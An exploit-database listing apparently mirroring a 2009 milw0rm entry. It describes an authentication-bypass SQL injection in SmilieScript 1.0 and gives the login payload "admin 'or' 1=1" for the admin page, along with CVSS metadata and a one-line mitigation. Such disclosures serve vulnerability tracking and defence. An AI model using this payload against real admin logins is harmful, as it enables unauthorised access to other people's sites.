SmilieScript - exploit.company

vendor:

SmilieScript

by:

Mr.tro0oqy

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: SmilieScript

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:smiliescript:smiliescript:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

SmilieScript <= 1.0 (Auth Bypass) SQL injection Valunrability

An attacker can bypass authentication by using the 'or' 1=1 parameter in the admin login page.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :SmilieScript <= 1.0 (Auth Bypass) SQL injection Valunrability

[+] Script site : http://www.smiliescript.com

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------

[Â»] Exploit : admin 'or' 1=1


[Â»] Cpanel : www.xxx.com/path/admin


Demo:
-----
http://www.smiliescript.com/demo
-----

# milw0rm.com [2009-08-10]